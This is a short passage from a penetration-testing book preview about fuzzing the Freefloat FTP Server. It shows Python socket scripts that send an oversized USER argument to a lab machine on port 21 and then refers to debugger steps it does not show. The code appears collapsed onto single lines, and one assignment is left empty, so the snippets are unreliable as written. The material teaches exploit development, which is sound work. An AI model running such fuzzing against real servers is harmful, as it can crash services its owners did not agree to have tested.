Fuzzing 

Since the manual way of using the nc command is not efficient, let's build a script to do so using the Python language:

#!/usr/bin/pythonimport socketimport sysjunk = s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)connect = s.connect(('192.168.129.128',21))s.recv(1024)s.send('USER '+junk+'\r\n')

Now, let's try the fuzzing phase with the USER parameter. Let's start with a junk value of 50:

#!/usr/bin/pythonimport socketimport sysjunk = 'A'*50s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)connect = s.connect(('192.168.129.128',21))s.recv(1024)s.send('USER '+junk+'\r\n')

And from our victim machine, let's attach the Freefloat FTP Server inside the Immunity Debugger and hit the run program once:

Let's register the contents:

Get Penetration Testing with Shellcode now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.